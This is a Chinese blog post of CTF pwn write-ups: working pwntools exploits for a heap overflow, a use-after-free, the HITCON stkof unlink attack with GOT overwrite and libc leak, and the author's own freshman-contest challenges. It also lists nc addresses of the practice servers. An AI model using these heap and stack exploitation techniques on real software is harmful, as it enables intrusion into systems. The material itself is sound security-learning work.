题集之三+新生考核wp

已于 2024-04-01 09:52:36 修改
阅读量875 收藏 13
点赞数 12
分类专栏: 精华刷题集_pwn 文章标签: 网络安全 安全 学习 linux
于 2024-03-31 23:32:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73858054/article/details/137212443
版权

题集之三

本周开始写堆相关的题

ezheap

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

就一个简简单单的堆溢出,直接看exp吧

from pwn import *
context(os='linux',arch='i386',log_level='debug')
sh = process("./ezheap")
# sh = remote("node5.anna.nssctf.cn",28070)

payload = b'a'*0x20 + b'\sh'
sh.sendline(payload)
sh.interactive()

UAF

[*] '/home/xunan/桌面/Pwn/heap/UAF/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

NX保护和canary,四肢健全(增删改查)。需要注意的是show功能,会将申请的序号为0的堆中的内容作为命令执行。

unsigned int show()
{
  int v1; // [esp+8h] [ebp-10h] BYREF
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  puts("Input page");
  __isoc99_scanf("%d", &v1);
  if ( v1 )
  {
    if ( v1 <= 0 || v1 > i )
      puts("NO PAGE");
    else
      echo((&page)[v1]);
  }
  else
  {
    (*((void (__cdecl **)(char *))page + 1))(page);
  }
  return __readgsdword(0x14u) ^ v2;
}

同时我们也无法通过edit对序号0的堆做出修改,所以利用UAF将其值修改即可。

from pwn import *
sh = process("./pwn")
context(os='linux',arch='amd64',log_level='debug')

def malloc():
    sh.recvuntil(b':')
    sh.sendline(str(1))
def edit(idx,text):
    sh.recvuntil(b':')
    sh.sendline(str(2))
    sh.sendline(str(idx))
    sh.sendline(text)
def free(idx):
    sh.recvuntil(b':')
    sh.sendline(str(3))
    sh.sendline(str(idx))
def show(idx):
    sh.recvuntil(b':')
    sh.sendline(str(4))
    sh.sendline(str(idx))

nico_addr = 0x8048642
malloc()
free(0)
malloc()
edit(1,b'sh\x00\x00'+p32(nico_addr))
show(0)
sh.interactive()

unlike

前情提要:每周要至少写五道题,结果本周给新生出题,间接导致题目没写够,所以拿来自己的学习笔记来凑个数,笔记是跟着ctf wiki学的,题目的 exp 在最后。

原理

​ 通过伪造fake chunk,假设存在指针*p指向fake chunk,使fd=p-0x18,bk=p-0x10,然后想办法使fake chunk触发unlink即可。

​ 在本例中选择伪造next chunk的prev_chunksize使其相信fake chunk已被释放,从而在释放next chunk的时候向前合并触发unlink。

作用

通过控制

用法解析

本题复现:题目链接

​ 在本题中使用了一个指针列表 global 用来存放所有申请的chunk,列表中的指针指向堆(但是具体是堆的哪里我就不太清楚了,个人感觉好像是堆的user_data部分"关于这一部分我觉得可以参考一下堆申请后指针指向位置")。所以我们可以通过 fake chunk 将 global 列表中的地址改为&global[ ]-0x18。正式由于这样我们才能实现任意地址写。

​ 顺带一提,这道题也是实现了任意地址写,通过这种方式,殊途同归了属于是。

​ 由于IO解析看不懂,这里我就暂时不贴了,想看的话可以点下面的链接跳转过去

基本信息 
➜  2014_hitcon_stkof git:(master) file stkof
stkof: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4872b087443d1e52ce720d0a4007b1920f18e7b0, stripped
➜  2014_hitcon_stkof git:(master) checksec stkof
[*] '/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/heap/example/unlink/2014_hitcon_stkof/stkof'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

可以看出,程序是 64 位的,主要开启了 Canary 和 NX 保护。

基本功能

程序存在 4 个功能,经过 IDA 分析后可以分析功能如下

  • alloc:输入 size,分配 size 大小的内存,并在 bss 段记录对应 chunk 的指针,假设其为 global
  • read_in:根据指定索引,向分配的内存处读入数据,数据长度可控,这里存在堆溢出的情况
  • free:根据指定索引,释放已经分配的内存块
  • useless:这个功能并没有什么卵用,本来以为是可以输出内容,结果什么也没有输出
本题思路
  • 利用 unlink 修改 global[2] 为 &global[2]-0x18。
  • 利用编辑功能修改 global[0] 为 free@got 地址,同时修改 global[1] 为 puts@got 地址,global[2] 为 atoi@got 地址。
  • 修改 free@gotputs@plt 的地址,从而当再次调用 free 函数时,即可直接调用 puts 函数。这样就可以泄漏函数内容。
  • free global[1],即泄漏 puts@got 内容,从而知道 system 函数地址以及 libc 中 /bin/sh 地址。
  • 修改 atoi@got 为 system 函数地址,再次调用时,输入 /bin/sh 地址即可。
关键参数解析

  1. global[ ] 指的就是申请的chunk列表,head指的就是global[]列表头部;

  2. free(3)之后他会unlike fake_chunk,然后他会将global[2]中的值改为;(&global[2])-0x18,此时再用edit(2)即可覆盖global列表;

  3. 通过修改global列表配合 exit 即可实现任意地址写。

exp
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
if args['DEBUG']:
    context.log_level = 'debug'
context.binary = "./stkof"
stkof = ELF('./stkof')
if args['REMOTE']:
    p = remote('127.0.0.1', 7777)
else:
    p = process("./stkof")
log.info('PID: ' + str(proc.pidof(p)[0]))
libc = ELF('./libc.so.6')
head = 0x602140


def alloc(size):
    p.sendline('1')
    p.sendline(str(size))
    p.recvuntil('OK\n')


def edit(idx, size, content):
    p.sendline('2')
    p.sendline(str(idx))
    p.sendline(str(size))
    p.send(content)
    p.recvuntil('OK\n')


def free(idx):
    p.sendline('3')
    p.sendline(str(idx))


def exp():
    # trigger to malloc buffer for io function
    alloc(0x100)  # idx 1
    # begin
    alloc(0x30)  # idx 2
    # small chunk size in order to trigger unlink
    alloc(0x80)  # idx 3
    # a fake chunk at global[2]=head+16 who's size is 0x20
    payload = p64(0)  #prev_size
    payload += p64(0x20)  #size
    payload += p64(head + 16 - 0x18)  #fd
    payload += p64(head + 16 - 0x10)  #bk
    payload += p64(0x20)  # next chunk's prev_size bypass the check
    payload = payload.ljust(0x30, 'a')

    # overwrite global[3]'s chunk's prev_size
    # make it believe that prev chunk is at global[2]
    payload += p64(0x30)

    # make it believe that prev chunk is free
    payload += p64(0x90)
    edit(2, len(payload), payload)

    # unlink fake chunk, so global[2] =&(global[2])-0x18=head-8
    free(3)		# 向前合并 fake_chunk
    p.recvuntil('OK\n')

    # overwrite global[0] = free@got, global[1]=puts@got, global[2]=atoi@got
    payload = 'a' * 8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi'])
    edit(2, len(payload), payload)

    # edit free@got to puts@plt
    payload = p64(stkof.plt['puts'])
    edit(0, len(payload), payload)

    # free global[1] to leak puts addr
    free(1)
    puts_addr = p.recvuntil('\nOK\n', drop=True).ljust(8, '\x00')
    puts_addr = u64(puts_addr)
    log.success('puts addr: ' + hex(puts_addr))
    libc_base = puts_addr - libc.symbols['puts']
    binsh_addr = libc_base + next(libc.search('/bin/sh'))
    system_addr = libc_base + libc.symbols['system']
    log.success('libc base: ' + hex(libc_base))
    log.success('/bin/sh addr: ' + hex(binsh_addr))
    log.success('system addr: ' + hex(system_addr))

    # modify atoi@got to system addr
    payload = p64(system_addr)
    edit(2, len(payload), payload)
    p.send(p64(binsh_addr))
    p.interactive()


if __name__ == "__main__":
    exp()

快来签到

前面有说到,本周为新生出了点题,不过学弟暂时只做出来两道,一道签到一道整数溢出,由于出的题也要做wp,所以这里就拿来凑数了。

出题思路

本意是为了防止学弟一道都写不出来留的签到题,64位编译,直接给shell,但是为了恶搞整了个udx加壳,反编译看不懂,嘿嘿

解题思路

直接nc即可获得shell

$ nc 8.130.106.113 10001
ls
bin
dev
flag.txt
lib
lib32
lib64
pwn

pwn1

出题思路

本意是考一下整数溢出来着,后来想了想索性字符串溢出一起考了,不过由于没测题所以比较意外的是居然还要注意栈对齐。

关于栈对齐的知识,可以参考这篇文章 > 传送门 <

解题思路
$checksec pwn1
[*] '/home/xunan/桌面/Pwn/newpwn/pwnlist/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
--------------------------------------------------
__int64 vuln()
{
  __int64 result; // rax
  int nbytes; // [rsp+Ch] [rbp-34h] BYREF
  char nbytes_4[44]; // [rsp+10h] [rbp-30h] BYREF
  int v3; // [rsp+3Ch] [rbp-4h]

  __isoc99_scanf("%d", &nbytes);
  puts("Input you payload:");
  read(0, nbytes_4, (unsigned int)nbytes);
  v3 = strlen(nbytes_4);
  if ( v3 > 32 || (result = (unsigned int)nbytes, nbytes > 32) )
  {
    puts("size out.");
    exit(0);
  }
  return result;
}

查看关键函数可以看到,本题有一个整数溢出和一个字符串溢出,另外其实有一个后门函数。

所以绕过这两处之后直接跳转到后门函数即可,不过需要注意可能需要进行栈对齐

from pwn import *
sh = process('./pwn1')

backdoor_addr = 0x40081B
ret_addr = 0x400611
sh.sendline(str(-1))
payload = b'\x00'*0x30 + p64(0) + p64(backdoor_addr)
sh.sendline(payload)
sh.interactive()

最后(xinshengkaohe)

最后的最后,新生考核赛已经完事儿了,租的服务器暂时闲置了,但是比赛的pwn题还在上面跑着。至少还能跑一周吧,都是一些比较新手向的题目,感兴趣的可以连上去看看。
题目以及源码放资源里嘞,复现环境看下面

ex2	: nc 8.130.106.113 10000
pwn	: nc 8.130.106.113 10001
pwn1: nc 8.130.106.113 10002
pwn2: nc 8.130.106.113 10003
pwn3: nc 8.130.106.113 10004

就这样吧,诸君武运亨通共勉。

进击的萝卜君
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
wordpress之wp-settings.php
10-30
wordpress之wp-settings.php
2022 SWPUCTF Web+Crypto方向wp
ph0ebus的博客
10-29 6110
简单阅读代码可以发现,__wakeup()方法会首先被激活,覆盖变量的值使flag不能被回显,因此这里需要绕过__wakeup()方法,__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。然后想办法读取文件,cat tac tail都被过滤了,那我们还可以利用nl查看文件内容,这里发现数字被过滤了,我们想到了*来匹配,但是*也被过滤了,尽管如此,我们还可以用?但是里面没有看到类似flag的东西,那就进入根目录看看,但是空格被过滤了,可以用${IFS}绕过。
2021 SWUP新生wp
XikX_eleven的博客
10-12 1850
2021 SWUP新生wpWebgift_F12caidao Web gift_F12 如题所示f12找到flag caidao 蚁剑连接(中国菜刀连接可能会显示没有root权限) 根目录flag
ACTF2020 新生赛 -- WP
会下雪的晴天
05-18 3050
做题思路记录,同时感谢赵师傅和Y1NG的环境与源码 文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Upload [ACTF2020 新生赛]Include 主页显示是一个链接,点进去看看,URL出现file=,结合题目判断为文件包含 用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx php:/.
记一次360众测仿真实战靶场考核WP
god_Zeo的安全博客
04-06 8433
0x00 考核主要分为两部分 第一部分为客观题:分为单选题,多选题,和判断题。 我记录了一道有趣的题,也是不清楚正确答案的群 第二部分为操作题: 0x01客观题 我记录了一道有趣的题,也是不清楚正确答案,有大佬知道吗 0x02:操作题 源码分析题,给你源码提及一个数据 PHP == 弱语言绕过 ,因为没弄过CTF也是印象比较深刻 网站被黑,可以下载整站,找后门 下载源码,找...
Android 智能指针详解 -- wp
私房菜
12-21 1万+
上一篇关于sp的博文,通过 source code 来解释了sp的功能,sp被称为强指针,但是强引用更贴切点。那么弱引用wp到底有什么功能?与sp有什么区别?这一篇通过 source code 来解释。
WP插件-站长必备免费WP插件
qq_787143156的博客
01-18 2532
如何利用WP插件做好SEO(搜索引擎优化)作为寻找新客户的关键策略。通过创建满足搜索条件并回答您的潜在客户提出的问题的内容,您就有机会赢得网站访问者并赢得他们的信任,SEO提供了丰富的见解、涉及链接构建、搜索引擎排名和关键字访问量。 利用WP插件可以为提高网站搜索引擎排名,如果您希望您的网站在Google、百度、Bing和Yahoo结果页面中快速轻松地出现,当您定期向网站介绍新的SEO内容时,搜素引擎会奖励您的努力和关心。如果网站与搜索字词相关且相关,则获得一致流量的几率会大大提高,并且可以理解.
实验吧隐写术WP(三)
热门推荐
Yale的博客
04-02 1万+
1.心中无码(http://www.shiyanbar.com/ctf/1947) 直接stegsolve看发现没怎么样,但是在blue的0处看起来有问题 跑python#coding:utf-8 from PIL import Imagelena = Image.open('Lena.png') b0 = '' #将像素点弄为0,1代码 bnum = 0 width,height =
wp2vite 踩坑之路
scelmx的博客
03-21 2851
前言 事情是这样——小组内部组织一次脑暴,我见组内有vue3项目但是没有使用vue3官方推荐的vite,表示疑问,然后就引入了接下来的事情,指派我来试水。啊~这感觉真不错。 受命 既然要做我们肯定要先考察考察,诶~功夫不负有心人啊,翻到了一个名叫wp2vite的玩意(这玩意是真坑啊),看了下与之相关博客,诶!又让我找到一个关于webpack-to-vite的仓库,心想那就整吧,这不都齐活了么。 折磨开始 安装wp2vite npm install -g wp2vite 使用 cd yourwork/you
wp网站,wp网站快速搭建,wordpress网站
xiaomaseo的博客
03-27 3196
wp网站,从技术上讲,WordPress是一个一个开源内容管理系统。 意味着不能将其安装在笔记本电脑或台式计算机上,而只能在 Web 服务器上运行。WordPress负责处理wp网站上发生的所有基本操作——它允许站长发布内容、更改设计等。由于WordPress正在做这一切,这意味着站长可以专注于创建内容、传达网站的信息。换句话说,站长不必担心运行网站的任何技术方面,因为wp网站会为站长完成所有这些工作。 wp网站有哪些优点呢?wp网站是开源系统,wp网站是免费的,wp网站是网站建设的终极DIY解.
记21年某次360众测考核试题记录
Love&Share
09-23 3319
题目分为两部分: 选择:单选,多选,判断 实操题:10个 时间:三个小时 可能会有的题目 登录框sql盲注,直接登录 PHPMailer远程命令执行漏洞 实操题是墨者学院的题,而且拿到的key也有mozhe字样,可以提前去玩玩 key一般在根目录下的key.txt或者key***.php 全程必须挂着VPN 选择 这是我当时做的,不一定正确 实操1 svn泄露 实操2 抓包改referer 实操3 前端弱口令,源码审计 $username=“admin”; $password
WP系列智能三回路数字显示控制
03-23
介绍了关于WP系列智能三回路数字显示控制的详细说明,提供上润的技术资料的下载。
wp内核新闻门户自动采集php+mysql|wp内核新闻门户自动采集.zip
11-26
wp内核新闻门户自动采集,php+mysql 内置采集规则,可自行添加更改,学习交流之用。 1.全自动采集,无人值守; 2.适合做站群,无需人工打理; 3.已经创建8个采集规则; 4.全部采用采集优质站点; 5.支持最新的PHP7.1...
寒假考核wp1
08-04
寒假考核wp1
英文blog模板+WP评论
09-22
模板+WP,评论模板的样式设置后可获取样式
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8233
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
解锁Nginx跨域谜题:3步打造安全高效的CORS策略
2401_85000826的博客
05-16 410
Nginx作为一款强大的Web服务器和反向代理服务器,经常被用于处理跨域资源共享(CORS,Cross-Origin Resource Sharing)策略,以允许或限制不同源之间的资源请求。CORS是一种安全策略,用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin(请求来源)的限制,以精确控制跨域请求。
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
最新发布
明明如月的技术博客
05-19 141
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 435
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
使用matlab代码:num,den打出以下公式:Gc=[Gc0*(1+s/wp)*(1+wl/s)]/(1+s/wp)
06-02
您可以使用以下MATLAB代码来实现: ``` syms s Gc0 wp wl Gc = Gc0*(1+s/wp)*(1+wl/s)/(1+s/wp); [num, den] = numden(Gc); num = expand(num); den = expand(den); [numCoeff, numExpo] = coeffs(num, s); [denCoeff, denExpo] = coeffs(den, s); Gc_tf = tf(double(numCoeff), double(denCoeff)); ``` 其中,`syms` 用于定义符号变量 `s`、`Gc0`、`wp` 和 `wl`。`Gc` 表示控制器的传递函数。`numden` 函数用于将传递函数拆分为分子和分母。`expand` 函数用于将分子和分母展开。`coeffs` 函数用于提取分子和分母的系数和次数。最后,使用 `tf` 函数将分子和分母转换为传递函数 `Gc_tf`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值